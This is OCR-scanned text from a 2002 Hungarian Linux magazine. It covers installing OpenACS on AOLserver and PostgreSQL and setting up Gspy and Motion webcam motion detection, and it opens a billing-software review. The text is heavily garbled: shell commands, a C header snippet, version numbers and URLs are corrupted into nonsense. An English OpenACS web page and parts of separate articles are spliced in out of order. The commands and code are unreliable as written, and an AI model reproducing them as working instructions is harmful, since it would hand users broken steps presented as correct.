része. Bár a programot egy másik adatbázisra újraírhatjuk 
(ahogy az PostgreSOL esetében meg is történt), és az alapér- 
telmezett Icl helyett akár egy másik nyelvet is használhatunk, 
az adatmodell az a hely, ahol a rendszer legtöbb hasznos 
képessége rejtezik. Az OpenACS elérhetővé teszi a Icl- és 
PlI/PgSOL-függvényeket, amelyek megkönnyítik az adatmo- 
dellel való munkát. 

Mivel az OpenACS ilyen nagymértékben függ a relációs adat- 
bázisoktól, igen fontos, hogy az adatbázis-hozzáférés rugalmas 
és hatékony legyen. Ezért az OpenACS telepítések majd" 
minden esetben az AOLservert használják (a múlt hónapban 
mutattuk be a Kovácsműhelyben) a népszerűbb Apache 
helyett. Minthogy az AOLserver több szálat használ egyetlen 
kiszolgálófolyamaton belül, egy közös tárolón keresztül képes 
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WHAT is OpenACS? 


OpenAcCsS (Öpen ÁArchitecture Community System) is an 
advanced tookit for building scalable, community-oriented web 
applications, If youre thinking of building an enterprise-level web 
application, CpenACS is a solid, proven founcation that will give 
you a 3-6 month headstart, 

2431 downloads of 


OpenACS relles on AÖL Server, a web/application server, and OpenACS 4.5b1 


PostareS OL, a true ACID-compliant RDBMS. These are two 
high-guality products available for free under open-source licenses, 
íread more) 


8129 downloads of 
OpenACS 3.2.5 
6779 downloads of 
OpenACS 3.24 
8849 downloads of 
OpenAcCsS / Apache 


The CpenACS tookits are based on the ArsLigita Community 
System. Ars Digita kindly GPL-d their work, making all of this 
possible. 


WHERE can I get OpenACS? 


You can download ÖpenACS from our software page, 


EISILASS is available under the GNU General Public Lice 
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az adatbázis-kapcsolatokat megosztani (bár az AOLserverhez 
igen sok szál fűzi az OpenACS-közösséget, nem lennék meg- 
lepve, ha a többszálú képességekkel rendelkező Apache 2.0 
bemutatása után a projekt figyelme is arra fordulna). Miközben 
az AOLserver saját adatbázis-API-val bír, az OpenACS számos 
magas szintű függvényt vonultat fel, amelyek rendkívül meg- 
könnyítik az adatbázissal való munkát. 

Ha csak egyetlenegy fajta adatbázissal szeretnénk dolgozni, 
akkor ezeket a függvényeket közvetlenül Icl programunkban 
is használhatjuk az adatok tárolására és kiolvasására. Ha vi- 
szont azt szeretnénk, hogy minden alkalmazás az összes felü- 
leten fusson, az OpenACS arra ösztönzi a fejlesztőket, hogy 
az összes adatbázis-lekérdezést különlegesen formázott XML- 
fájlokba helyezzék (.xg! kiterjesztéssel ellátva), ahol minden 
egyes fájl egy-egy adatbázishoz tartozik. Mikor a Icl program 
el akar küldeni egy lekérdezést az adatbázisnak, és ezért 
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meghív egy függvényt, az OpenACS , lekérdezéstovábbítója" 
(guery dispatcher) megnyitja a pillanatnyi adatbázishoz tartozó 
XML-fájlt, beolvassa a lekérdezést, majd elküldi az 
adatbázisnak. A lehetőséget kihasználó OpenACS-rendszer 
képes lesz egyetlen legfelsőbb szintű beállításfájl megváltoz- 
tatásával PostgreSOL-ről Oracle-re váltani. 

Mint azt a múlt hónapban láthattuk, az AOLserver saját 
sablonrendszerrel rendelkezik, amelyet ADP-nek neveznek; 
ebben a kiszolgálóoldali programokat könnyedén keverhet- 
jük statikus HIML-lapokkal. lermészetesen ez azt is jelenti, 
hogy a tervezők és a programozók gyakorta harcot vívnak 
egymással egy-egy fájl birtoklásáért, így a tervezőknek tud- 
niuk kell, hogy a lap melyik részét ajánlott elkerülniük. 

Az OpenACS ezért egy új, még fejlettebb sablonrendszert 
vezetett be, amely a lapokat két részre bontja: Icl-lapra, amely 
a változókat állítja be, és ADP-lapra, ami ezeket a változóérté- 
keket felhasználja. Ez a megközelítés némileg hasonlít a Zope 
lapsablonjaira (Zope Page lemplates — ZPT) és az Enhydra 
XMLC rendszerére. 


Tervezés 

Az OpenACS hihetetlenül bonyolultnak tűnhet, pedig mind- 

össze négy része van: 

1. a feltelepített PostgreSsOL- vagy Oracle-kiszolgáló; 

2. az AOLserver nsxml-támogatással fordítva (ez az AOLserver 
XML-értelmező modulja), a PostgreSOL-, illetve az Oracle- 
meghajtók, valamint a hozzá tartozó beállításfájlok; 

3. az OpenACS adatmodell; 

4. OpenACS IcIl-könyvtárak, a Icl-lapok és az ADP-lapok. 


Az OpenACS telepítése egészen a 4.x változatig igen egyszerű 
volt. Felraktuk a PostgreSOL-t és az AOLservert, betöltöttük 
az OpenACS adatmodellt a psal parancssoros ügyfélprog- 
ramjával, átmásoltuk az OpenACS-könyvtárakat, IcI-lapokat 
és ADP-lapokat a megfelelő könyvtárba, és már használhattuk 
is a rendszert. 

Ez a megközelítés azonban sajnos számos gondhoz vezetett, 
amelyek többnyire a telepítés rugalmatlanságából adódtak. 
Mit tegyünk, ha a fórumokat az alapértelmezett /bboard helyett 
történetesen két különböző URL alól is el akarjuk érni? Mi a 
helyzet, ha csak két vagy három csomagot szeretnék feltelepí- 
teni az eredeti negyven helyett? Mit tegyünk, ha csak az e-üz- 
letrészt szeretnénk frissíteni, miközben a GyK-rendszert válto- 
zatlanul szeretnénk hagyni? 

A gondok megoldását az ArsDigita csomagkezelő (ArsDigita 
Package Manager) jelentette, amely az ArsDigita ACS 4.x-es 
változatában jelent meg, és hamarosan az OpenACS 4.x is 
átvette. Minden alkalmazás csomag (package) formájú lett, 
amely tartalmazta az adatmodellt, az .xgl-fájlokat, a IcI-könyv- 
tárakat, a Icl-lapokat és az ADP-lapokat, valamint a leírást. 
Minden csomagot tetszőleges számú URL alá fel lehet telepí- 
teni a rendszeren, és bármilyen jogosultság rendelhető hoz- 
zájuk (az OpenACS tengelyét alkotó felhasználók és csoportok 
rendszerének felhasználásával). Ezen kívül minden csomag 
megadhat egy vagy több tulajdonságot, amellyel testreszabott 
adatot vehetnek át az egyes példányok létrehozásakor. 

Ha az OpenACS-t a /web/openacs4 könyvtárba helyezzük, a 
www könyvtár fogja tartalmazni az összes felsőszintű IcI- és 
ADFP-lapot, a tc! könyvtár pedig a Icl-könyvtárak felső szintű 
fájljait, illetve apackages könyvtárban találhatjuk meg a 
rendszerbe töltött valamennyi modult. 

Amint a csomag a fájlrendszerre került, az OpenACS webalapú 
telepítőprogramjával az adatbázisban máris létrehozhatjuk 
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a csomagfüggő adatmodellt. Végül a hely rendszergazdája 
elérhetővé teheti a csomagot úgy, hogy befűzi (egy vagy több 
példányban) a felügyeleti honlaptérképen. Befűzés után az 
alkalmazás a megfelelő címen azonnal elérhető lesz. 


Az OpenACS telepítése 

Most, hogy már bemutattam az OpenACS mögött rejtőző 
elveket, készen állunk a telepítésre. A folyamat viszonylag 
összetett, mivel több csomagot is fel kell tennünk egyedi tulaj- 
donjogokkal és jogosultságokkal. Az OpenACS 4.5 telepítési 
folyamata gördülékenyebb és egyszerűbb, mint a korábbi 
változatoké, de azért a műveletek során még mindig megle- 
pően könnyű hibát véteni. 

Mielőtt nekikezdenénk, győződjünk meg róla, hogy a 
PostgreSOL 7.1.3, illetve annak kiszolgáló-, ügyfél- és fejlesztői 
könyvtárai fel vannak-e már telepítve. A PostgreSOL legfris- 
sebb változata (7.2) néhány apró dologban nem működik 
együtt a régebbi változatokkal, amik miatt az OpenACS telepí- 
tése során esetleg nehézségek adódhatnak. Bár meglehetősen 
sok továbbfejlesztést találunk a 7.2-ben, nem olyan nagy baj, 
ha megmaradunk 7.1.3-nál. 

Győződjünk meg arról is, hogy már feltelepítettük a libxml 
2.x-et; Red Hat rendszereken azt kell megnéznünk, hogy a 
libxm12 és a libxm12-devel RPM-csomagok telepítve 
vannak-e. Ezek nélkül az OpenACS nem tudja majd megnyitni 
a fájlokhoz rendelt .info csomagot, illetve a lekérdezéstovábbító 
által használt .xgl-fájlokat. 

Következő lépésként telepítenünk kell az AOLservert, ellenő- 
rizve, hogy a /usr/local/aolserver az nsadmin felhasználó 
tulajdonában van-e: 


H mkdir /usr/local/aolserver 
H useradd nsadmin 
H chown -R nsadmin /usr/local/aolserver 


Az egyik lehetőség, hogy feltelepíthetjük az AOLserver szoká- 
sos változatát, alkalmazva rá az ArsDigita- és az OpenACS- 
csapat által évek alatt létrehozott foltot, majd külön letöltjük 

a PostgreSOL- és az XML-értelmező modulokat. A másik lehe- 
tőség, hogy mindezek helyett egyben letöltjük , Matts AOLser- 
ver distribution" nevezetű , mindent az egyben" változatot 
(lásd a Kapcsolódó címeket). 

Következő lépésként hozzunk létre egy PostgreSOL-felhasz- 
nálót openacs4 néven, és adjunk neki teljes jogosultságot 

(a PostgreSOL saját felhasználólistával rendelkezik, amely 
független a Unix-listától). Általában az ilyen tevékenységet 
nem Unix- (Linux-), hanem Postgres-felhasználóként kell 
elvégezni: 


$t su postgres 

H createuser openacs4 
Shall the new user be allowed to create 
-databases? (y/n) y 
Shall the new user be allowed to create 
more new users? (y/n) y 
CREATE USER 


az adatbázis létrehozásához — amit openacs4-nek fogunk 
nevezni — használjuk ezt a frissen készített PostgreSOL- 


felhasználót: 


H createdb -U openacs4 openacs4 
CREATE DATABASE 
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Megéri foglalkozni az OpenACS-sel? 


Ne köntörfalazzunk: az OpenACS bonyolult darab. 

Bár a program maga többnyire kitűnő, módosítása és 
használata tapasztalt Unix-, web- és adatbázis-szakértőt 
kíván. Bár a telepítés folyamata hosszadalmas és össze- 
tett, saját tapasztalataim alapján mindenkit biztosíthatok, 
hogy gyakran meglehetősen nehéz megérteni, hol követ- 
tük el a hibát. A leírás egyre fejlődik, de azért még elég 
sok hiányosságot és nehezen érthető táblaszerkezetet 
találhatunk benne, ami bizony zavaró lehet. 

Mintha mindez nem volna elég, a kód sok helyen nincs 
még teljesen befejezve. Igaz, az OpenACS nyílt forrású, 
ami azt jelenti, hogy magunk is kijavíthatjuk a hibákat. 

A közösség általában nyitott és nagylelkű, és segíti azo- 
kat, akik meg szeretnék tenni az első lépéseket. Ennek 
ellenére elég kiábrándító, ha az ember folyton csak azt 
hallja, hogy a neki szükséges modul már majdnem ké- 
szen van, vagy valaki csak egy későbbi időpontban szán- 
dékozik azt befejezni. Általában nem szoktam ellenérzé- 
seket táplálni, ha egy nyílt forrású projekt segítéséről van 
szó, különösképpen akkor nem, ha az közvetlenül az én 
(és ügyfeleim) segítségére is van, de az apró bosszúsá- 
gok hamar felhalmozódnak. 

Ezeket a panaszokat hallva teljesen képtelen ötletnek 
tűnhet, hogy egyáltalán bármilyen kismértékben is 
támogatom az OpenACS-t. Igaz, ami igaz, valószínűleg el 
kell telnie egy kis időnek, amíg a por leülepszik, és az 
összes szükséges fejlesztés elkészül. De nem kerülhetjük 
ki azt a tényt, hogy az OpenACS messze gazdagabb 
háttérkörnyezetet tud nyújtani az online-közösségek 
készítéséhez, mint bármi, amit valaha is láttam. Mégha 

a csatolt alkalmazások nem is működnek teljes mérték- 
ben, átfogóan vizsgálva igen jól teljesítenek, és szinte az 
összes szolgáltatást képesek megvalósítani, amit csak 
ügyfeleim ki szeretnének hozni a gépből. Végül számos 
üzleti tanácsadó vállalkozás, több egyetem, illetve egy- 
két tucat független tanácsadó dolgozik vállvetve az 
OpenACS csomagjain, ami azt sugallja, hogy egy napon 
jóval megbízhatóbb és okosabb lesz, mint manapság. 
Amennyiben online-közösség létrehozására adnánk a 
fejünket, és nem félünk bepiszkítani kezünket egy kis 

Tel- és SOL-kóddal, valóban érdemes komolyan foglal- 
koznunk az OpenACS-sel. E hónapban az OpenACS szer- 
kezetét néztük meg nagy vonalakban, illetve láthattuk, 
miképpen telepíthetjük az egyes elemeket. A Kovácsmű- 
hely következő részében megvizsgáljuk, hogyan lehet 

az OpenACS-sel érkező különféle csomagokat telepíteni 
és kezelni, hogy végül olyan testreszabott közösségi 
oldalt készíthessünk, amely csak a valóban szükséges 
programokat tartalmazza. 


Ezt követően rendszergazdaként bejelentkezve telepítsük 

fel magát az OpenACS-csomagot. A legfrissebb kiadást 
(openacs-4-5-release.tgz) az 5 http://openacs.org-ról tölthetjük 
le (illetve a 41.CD Magazin/OpeACS könyvtárban is meg- 
találhatják). A csomagot a hagyományoknak megfelelően 

a /web könyvtár alá csomagoljuk ki: 


H mkdir /web 





cd /web 
tar -zxvÍ /tmp/openacs-4-5-release.tgz 
mv /web/openacs-4 /web/openacs4 


az OpenACS-telepítő üdvözlő szövegét látjuk képernyőn. 
Kövessük a rendszer létrehozásáról szóló utasításokat, és 
mutassunk az alul található Next gombra, amint megjelenik. 
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chown -R nsadmin.nsadmin /web Megjegyzem, a telepítési folyamat eltarthat pár percig, hiszen 
a telepítőnek nagyszámú adatbázistáblát kell létrehoznia. 

A telepítési folyamat végefelé meg kell adnunk az OpenACS- 
rendszergazda levélcímét, illetve pár további rendszerjellemzőt. 
Az utolsó lap üdvözöl bennünket az OpenACS-ben és jelzi, 


hogy az AOLserver leállt (ami elkerülhetetlen, hiszen a frissen 


a a 


A fenti lépések végrehajtása után az összes nagyobb darab a 
helyére került. Már csak egyetlen dolgunk maradt: ezeket a 
darabkákat az AOLserver beállításfájljában egymáshoz kell 
kapcsolnunk. Kiindulási alapként a 8 http:/openacs.org-ról 
letölthetjük az openacs4.tcl.txt fájlt, és miután átneveztük 


openacs4.tcl-re, helyezzük a /usr/local/aolserver könyvtárba, 


majd a következők szerint szerkesszük át: 


Változtassuk meg a HITP-kaput arra az értékre, ahol 

a kiszolgálót futtatni akarjuk. A HTIP-kiszolgáló alapértel- 
mezés szerint a 80-as kapun fut; a minta beállításfájlban 
ezt 8000-re módosítottuk. 

Írjuk át a hostname (gépnév) és address (cím) beállításokat 
(14. és 15. sor) a rendszerünk alapjául szolgáló számítógép 
valódi gépnevének és IP-számának megfelelően. Elmélet- 
ben az openacs4.tcl kódja képes önműködően lekérdezni 

a gép nevét és IP-számát. Ha azonban gépünk egynél több 
IP-számmal vagy névvel rendelkezik, esetleg kipróbálásá- 
hoz a localhost nevet szeretnénk felhasználni, muszáj 
kézzel beállítanunk. 

Változtassuk meg a [7. sorban olvasható nevet arra a ki- 
szolgáló- és adatbázisnévre, amelyet használni szeretnénk, 
és amelynek annak a könyvtárnévnek kell lennie a /web 
könyvtáron belül, ahová az OpenACS programot telepí- 
tettük. Ha tehát az OpenACS programot a /web/foo könyv- 
tárba raktuk, adatbázisunkat szintén foo-nak nevezzük. 

A kiszolgálóváltozó a 17. sorban ennek megfelelően úgy- 
szintén foo lesz. 

A 18. sort módosítsuk úgy, hogy a létrehozni kívánt online- 
közösség nyilvánosságnak szánt nevét tartalmazza. 
Minden egyes sornak - ahol csak az ns param felhasz- 
nálót látjuk — az értékét változtassuk meg openacs4-re, 
azaz arra a PostgreSOL-felhasználónévre, amely az adatbá- 
zist létrehozta. Ezt az AOLserver által a PostgreSOL-hez 
megnyitott mindhárom, main, log és subguery nevű 
adatbázis-tárolóban egyaránt meg kell tennünk. 


Amint ezeket a változtatásokat végrehajtottuk, készen is állunk 
a rendszer futtatására. Rendszergazdaként az előtérben 
indítsuk a kiszolgálót: 


8 cd /usr/local/aolserver 


kt 


./bin/nsd -f -u nsadmin -g nsadmin -t 


sopenacs4.tcl 


Igen sok hibakereső adatot láthatunk a képernyőn, ami való- 
színűleg jóval gyorsabban halad, semmint el tudnánk olvasni. 
Amikor a görgetés abbamarad, a végefelé valami ehhez 
hasonlót kell látnunk: 


[22/Ju1/2002:15:13:41] [23316.1024] [-main-] 


Notice: nssock: listening on 127.0.0.1:8000 


[22/Jul/2002:15:13:41] [23316.8201] [-nssock-] 


Notice: nssock: starting 


[22/Jul/2002:15:13:41] [23316.8201] [-nssock-] 


Notice: nssock: accepting connections 


Amennyiben így történt, böngészőnket irányítsuk a 
http://localhost:8000/ címre. Ha minden jól ment, a képernyőn 
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tölteni). Indítsuk újra a kiszolgálót, majd böngészőnket irá- 
nyítsuk ismét a Http://localhost:8000/ címre, és az OpenACS 
máris ott várakozik ránk, harcra készen. 

Ettől kezdve az OpenACS teljes mértékben működőképes, 
de mivel egyetlenegy csomagot sem telepítettünk, túl sokat 
nem tehet értünk. A következő hónapban azt fogjuk meg- 
vizsgálni, hogyan tudjuk az OpenACS csomagjait telepíteni 
és kezelni. 
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Rewen M. Lerner 

(reuvenolerner.co. 11) egy kisebb webes 
és internetes módszerekkel foglalkozó 
tanácsadó cég tulajdonosa és vezetője. 
Az ATF honlapon érhető el 

(2 http:/Avww.lerner.co.il/atf/). 





Kapcsolódó címek 


Nem túl meglepő módon az OpenACS- 

közösség kapcsolattartásra a saját programját használja. 
A 5 http://openacs.org-on található elsődleges honlap 
sok hasznos értekezésnek ad otthont, de leírásokat, 
programokat és foltokat is találhatunk Itt. Bár elolvas- 
hatjuk (és olvassuk Is el!) az 

9 http://openacs.org/doc-ban található leírást, a 

2 http://openacs.org/bboard címen fellelhető írások 
talán még hasznosabbnak bizonyulnak a technológiával 
ismerkedők számára. 


Az OpenACS telepítéséhez szükségünk lesz az 

AOL serverre Is — mint a cikkben már jeleztük, érdemes 
a 9 http://openacs.org-on található változatot használni 
a 5 http:/Avww.aolserver.com helyett. A gondok meg- 

előzése végett azt Javaslom, inkább a PostgreSOL 7.1.3 
(és ne a frissebb 7.2) változatot telepítsük, amelyet a 

2 http:/Avww.postgresal.org címről szerezhetünk be. 


A Matt AOL server terjesztése a 
2 http://uptime.openacs.org/aolserver-openacs/ 
aolserver3.3ad13-oacs1-beta-src.tar.gz címről tölthető le. 


Az OpenACS és a PostgreSOL vagy Oracle telepítéséről 
szóló részletes útmutatást találhatunk a 

2 http://openacs.org/doc/openacs-4/postgres.html 
címen. Mielőtt vakon követnénk az utasításokat, ne 
felejtsük el elolvasni a felhasználók lap alján található 
megjegyzéseltt. 


2002. november 
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Egy kis biztonság videóoöntettel 





Ne tegyük kockára kedvenc borainkat! Tartsuk őket állandó felügyelet alatt 


a Linux mozgásérzékelő eszközeivel. 


yere csak ide, Francois, ezt nézd meg! Igen, egy néhány 
perce rólad készült videofelvételt nézünk. Hogy miért? 
Mint azt te is tudod, Francois, e havi témánk a bizton- 
ság. Minthogy mindenki a számítógépes és hálózati biztonságról 
szokott beszélni, én valami mást szeretnék kínálni a vendégeink- 
nek. A biztonság, csakúgy, mint a bor, nagyon sokféle lehet. 

Íme, itt vagy, amint feljössz a pincéből. Nagyon mulatságos a 
járásod, mon ami. Francois, nem is figyelsz! Mi nyugtalanít? Ó, 
már látom, megérkeztek a vendégeink. Isten hozott, mes amis! 
Üljetek le, helyezzétek magatokat kényelembe! Francois, sza- 
ladj le a pincébe és hozd vissza azt az 1997-es Napa Valley 
Merlot-t, amit korábban kóstolgattunk. Nagyon fogjátok sze- 
retni ezt a bort, mes amis — mélyvörös szín, málna- és cseresz- 
nyezamatok, hosszan tartó íz. 

Már ott is van! Mes amis, hadd irányítsam a figyelmeteket erre 
a monitorra. Jól figyeljetek! Amint látjátok, Francois éppen a 
borospince keleti szárnyában tartózkodik. Mindezt azért mu- 
tatom most meg nektek, hogy megismertessem veletek a mai 
menünket, ez a , Biztonság videó alkalmazásával". Amikor 
Linux-konyhánkban a biztonságról esik szó, szinte mindig a há- 
lózati biztonságra gondolunk. Ritka esetben még a felhasználói 
biztonságról is hajlandóak vagyunk eszmét cserélni. Na de mi 

a helyzet otthonunk biztonságával? Előfordulhat, hogy van egy 
nagy kiterjedésű borospincénk, amin rajta akarjuk tartani a sze- 
münket. Nem túl költséges? Esetleg bonyolult? Iudtátok, hogy 
egy kamerás felügyeleti rendszer már egy olcsó webkamera árát 
alig meghaladó összegért felállítható? Ennek a receptnek az 
elkészítéséhez a Radio Shacktól kapott Creative Labs CI6840 
USB-kamerát, Linux-rendszeremet és néhány billentyűleütést 
használtam fel. Nem hangzik rosszul, igaz? De várjatok csak! 
Ahogy a tévében szokták mondani: ez még nem minden. 

Az olcsó és egyszerű kamerás felügyeleti rendszer akkor kezd 
igazán érdekessé válni, ha mozgásérzékeléssel is összekapcsol- 
juk. Ez a gondolat állt Lawrence P. Glaister Gnome-ra írt biz- 
tonságikamera-programjának, a Gspynak hátterében is. A Gspy 
akár a későbbi áttanulmányozás céljából napi MPEG-filmek 
előállítására is használható a Berkeley MPEG-eszközökkel 
(ezekről rövidesen szólni fogok). A program JPEG formátumú 
képeket rögzít meghatározott, előre beállítható időközönként. 
Amennyiben nincs mozgás, kevesebb képfelvétel készül, de 
mindegyik kép ugyanúgy dátum- és időbélyegzővel lesz ellát- 
va. Mihelyt az eszköz mozgást észlel, visszatér a szabályos, 
rövid időközönkénti képfelvételekhez. Az 1. képen a Gspy 
működéséről láthattok egy pillanatképet. 

A Gspy sikeres kivitelezéséhez szükség van a videodlinux-bő- 
vítésekre (640 x 480 felbontással) és szinte biztosan kelleni fog 
az USB-támogatás is (a kamera számára). Ez azt jelenti, hogy 
valószínűleg egy nem túl régi Linux-rendszercsomagra vagy 
-rendszermagra lesz szükségetek. Először is töltsétek le a Gspy 
forrását a 59 http://gspy.sourceforge.net címről. 

A forráskód merevlemezünkre történő biztonságba helyezésé- 
vel megérett az idő a hagyományos ötlépéses kicsomagoló- 
fordító eljárásra: 
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tar -xzvÍ gspy-0.1.4-src.tar.gz 

cd gspy 

. configure 

make 

su -c make install 

Ez minden. Csaknem. Szóba hoztam a videofelvétel készítését, 
úgyhogy vizsgáljuk meg, mit kell még tennünk hozzá. 
Szükségünk lesz az mpeg encode programra, ami a 


File  Settings Help 





A Gspy éber szeme előtt 


2 http:/bmrc.berkeley.edu/frame/research/mpeg/mpeg encode 
HIML oldalon elérhető Berkeley MPEG tools része. 
Csomagoljuk ki a forrást, és váltsunk a kérdéses könyvtárra: 
tat -XxzvIi mpeg. encödé-i .5b-sre tát. oz 

cd mpeg. encodeé 

Á, a 22-es asztalnál ülő fiatal hölgy észrevette, hogy nem 

a megszokott ötlépéses kicsomagoló-lefordító eljárást használ- 
tam. Bravó, mademoiselle! A Berkeley MPEG tools fordítása 
nem túl bonyolult, de szükség van hozzá egy kis cifrázásra. 
Aki vállalja, annak meg kell nyitnia a Makefile állományt, és 
hatástalanítania kell a beállított CFLAGS meghatározást, majd 
ki kell vennie azt a sort, ami egy Linux-fordításnak felel meg 
(csak keressetek rá a LINUX szóra). Ezután a headers/ 
libpnmrw.h állományban hatástalanítani kell a mal1loc 
meghatározást. Ez a rész így fest: 

/r Hinclude -c-malloc.h: 

Hif ldefined(sco) 66 !defined(sgi) 66 

— [defined(IRIX) extern chartr malloc-() ; 

ttendif §/ 

Figyeljétek meg a hatástalanítás eszközeként működő megjegy- 
zés kezdetét mutató " / Fr" jelet az első sorban, és a végét mu- 
tató (§/) jelet az utolsó sor végén. Ugyanezzel a módszerrel 
kellett megszabadulnom az extern char" sys errlist[(] 
meghatározástól a libpnrmw.c fájlban, mielőtt a csomagot le 
tudtam volna fordítani. Amikor mindezekkel végeztünk, jöhet 
a make parancs és az ezt követő su --c make instal1. 
Nincs ennek könnyebb módja? - kérdezitek. A válasz: de igen, 
van. Egy gyors kereséssel az mpeg encode kifejezésre a 





2 http:/www.rpmfind.net címen előrefordított RPM-csoma- 
gokat lelhetünk fel a Világhálón. Most már, mes amis, minden 
megvan, amire szükségünk van. Indítsátok el a programot a 
gspy £ paranccsal. A Gspy alapértelmezett bemeneti eszköz- 
ként a /dev/video0 eszközt használja, de ez a beállítás a Prefe- 
rences (környezeti beállítások) menüpontban megváltoztatható. 
A 2. képen a beállítások párbeszédablakáról láthattok egy képet. 
Itt egy spy nevű alkönyvtárt hoztam létre a saját könyvtáram- 
ban. Ebben az alkönyvtárban a program egy újabb alkönyv- 
tárat hoz létre, ennek a neve a képek rögzítésének dátuma, 
például a 2002. július 19-én létrehozott képek alkönyvtára 

a 20020719 lesz. Az egyes képeknek az alkönyvtárban külön 
fájlok felelnek meg, a képek száma pedig több dologtól függ. 
Nézzünk ismét a General configuration (általános beállítások) 
fülre, ahol a képkészítés időközét Il másodpercben határoztam 
meg. Azt is megadtam, hogy a program minden húsz másod- 
percben készítsen egy képet. Ez annyit tesz, hogy mégha az 
érzékelő nem is jelez mozgást, akkor is készül egy (teljes dá- 
tum- és időpecséttel ellátott) 
kép húsz másodpercenként. 
A többi fülön beállíthatjuk 

a videodlinux eszközt 
(alapértelmezésben a 
/dev/video0 eszköz), a külön- 
böző riasztási küszöbérté- 
keket és egy jelölőnégyzet 
segítségével eldönthetjük, 
szükségét érezzük-e annak, hogy a rendszer minden esetben 
hangjelzést adjon, amikor mozgást érzékel. 

A rendszer nyilvánvaló csapdája, hogy meglehetősen nagy lemez- 
területet foglalhat el a feladat végrehajtása során, ezért legyetek 
körültekintőek. Amikor megfelelő mennyiségű adatot sikerült 
összegyűjteni, az Application menü File menüpontjára kattintva 
kiválaszthatjuk, hogy a rendszer az összes képünkből egy MPEG- 
mozgófilmet készítsen, aminek a neve video.mpg lesz. Amikor 

a mozgófilm elkészült (ne felejtsd el, hogy több kép több időt je- 
lent, tehát légy türelmes), elővehetjük kedvenc MPEG-lejátszón- 
kat és visszajátszhatjuk az eseményeket. Nem számítva a Gno- 
me- és KDE-felületekkel együtt érkező tetszetős grafikus leját- 
szókat, talán megtaláljuk gépünkön az smpeg programcsomag 
részeként feltelepülő, egyszerű plaympeg programot. 

A Motion - ahogy neve is utal rá — egy másik videoprogram, 
ami mozgásérzékeléshez a videodlinux szolgálatait veszi igény- 
be. A megközelítés módja azonban egy kicsit eltérő. Először is 

a program parancssoralapű, és egy átfogó beállítófájlon (alapér- 
telmezésben a /usr/local/etc/motion.conf) keresztül nyújtja a beál- 
lítási lehetőségek széles választékát. A program démonként fut- 
tatható a háttérben, csak akkor készít képet, amikor a vizsgált 
területen mozgás történik. A Gspyhoz hasonlóan a Motion is 
képes (a Berkeley MPEG tools felhasználásával) a rögzített képe- 
ket a későbbi vizsgálat céljából mozgófilmmé alakítani. A Motion 
más programok felé is képes adatok szolgáltatására, programok 
futtatását indíthatja el az érzékelés előtt vagy után, és lehetősé- 
get nyújt a képek SOL-adatbázisban történő elhelyezésére. 

A Motion beszerzését a program honlapján kell kezdenünk, a 
2 http://motion.technolust.cx címen. Látogatásomkor a 3.0.4-es 
változat volt elérhető. A telepítés a szokásos ötlépéses eljárás 
példáit szaporítja: 

tar -xzvÍ motion-3.0.4.tar.gz 

cd motion-3:0.4 

./configure 

make 

Si -€ make iüstáll 
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Fogadó a LINuxhoz — a LInuxhoz 


Ez minden teendőnk. A program futtatásához egyszerűen a 
motion parancsot kell beírnunk és elfogadnunk az összes alap- 
beállítást, ami a /usr/local/etc/motion.conf beállítófájlban talál- 
ható. A másik lehetőség, hogy a kívánt beállításokat parancssori 
kapcsolódóként adjuk meg, a következő példának megfelelően: 
motion -B -w -g 30 -t /home/mgagne/motion 
Mielőtt ezeket a kapcsolókat elmagyaráznám, el kell monda- 
nom, hogy az alapértelmezett beállítások VIDIOCGCHAN hibá- 
val megszakították a program működését. Ennek az volt az 
oka, hogy nem használtam a video-vizsgálóhurok beállítást 
(amely külön meghajtóprogramot igényel), de a beállítófájlban 
még beállítva szerepelt. Ha ugyanebbe a hibába futnátok bele, 
hatástalanítsátok az input 2 sort a fájl eleje közelében. A kér- 
déses szakasz valahogy így néz ki: 

H The input to be used 

t Default: 8 

input. 2 

Az utolsó sor az, amit a kettős kereszt jellel megjegyzésnek 
jelöltem ki. Most, hogy elmondtam a gyötrelmeimet és szen- 
vedéseimet, nézzük azokat a parancssori kapcsolókat! A -B 
beállítás arra utasítja a Motiont, hogy az egyes események rög- 
zítése után MPEG-filmet készítsen. A -w bekapcsolja a villany- 
kapcsoló-szűrőt (light-switch filter), amely a Motiont többé- 
kevésbé visszatartja attól, hogy a fényviszonyok változásait 
eseményként értelmezze, míg a -g kapcsoló segítségével az 
események közti másodpercek száma állítható be. Végül szük- 
ségetek lesz némi lemezterületre a készülő képek tárolására, 

a -t kapcsoló éppen ennek a helynek a beállítására való. 

Egy másik gond, amivel szembekerülhettek, az MPEG tools 
telepítésével kapcsolatos. Ha forráskódból fordítjátok, az 

mpeg encode program a /usr/local/bin könyvtárba kerül. 
Amennyiben RPM-csomag a forrás, a futtatható állomány 

a /usr/bin alatt fog elhelyezkedni. A Motion viszont az 

mpeg encode programot a /usr/local/bin könyvtárban fogja 
keresni, ezért a megfelelő működés érdekében módosítani kell 
a beállítófájlt. Keresd meg a /usr/local/etc/motion.conf fájl alábbi 
sorát, és győződj meg róla, hogy élesre van-e állítva: 

mpeg encode yes 

Ha telepítéshez az RPM-csomagot használtad, az itt következő 
sort írd be a fenti sor alá: 

mpeg encode bin /usr/bin/mpeg encode 

Ha minden esemény után létrehozzuk a hozzá tartozó mozgó- 
képet, célszerűnek látszik megszabadulni az elmentett JPEG- 
képektől. Ez a kis beállítás eztönműködően elvégzi. Érdemes 
a guiet yes beállítást is megfontolni, hacsak nem akarjuk, 
hogy minden egyes alkalommal, amikor a rendszer mozgást 
érzékel, hangjelzéssel adja a tudtunkra. 

Ahogy közeledik a záróra, mes amis, be kell vallanom, nyo- 
maszt az érzés, hogy megfigyelhetnek. Viszontlátásra a 
következő hónapig! A votre santé! Bon appétit! 
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Linuxos számlázóprogramok 





A hazai linuxos programok kínálatán végigtekintve három 
olyan programot sikerült találnom, amely kimondottan az irodai, 
vállalati alkalmazások kínálatát hivatott bővíteni. 


készíteni, amiben gyönyörű összehasonlító táblázatok- 

kal, grafikonokkal szemléltettem volna, hogy a három 
program mire képes, milyen szolgáltatásokat tartalmaz, és 
megvizsgáltam volna az ár/teljesítmény viszonyt is. Erről saj- 
nos le kellett mondanom, mivel hiába készültek egyazon fela- 
dat ellátására, összehasonlításra alkalmas, minden szempontból 
jól azonosítható pontokat csak erős megkötésekkel vagy bele- 
magyarázással találtam volna. Így, az egyes területeket vizs- 
gálva mindhárom termék komoly hátrányba került volna a 
többihez képest, amivel csak azt értem volna el, hogy a prog- 
ramok átfogó ismertetése helyett egy szűk, lényegében semmit- 
mondó anyagot készítek. Ezért alaposan átdolgoztam az első 
változatot és három külön egységet képező anyagot hoztam 
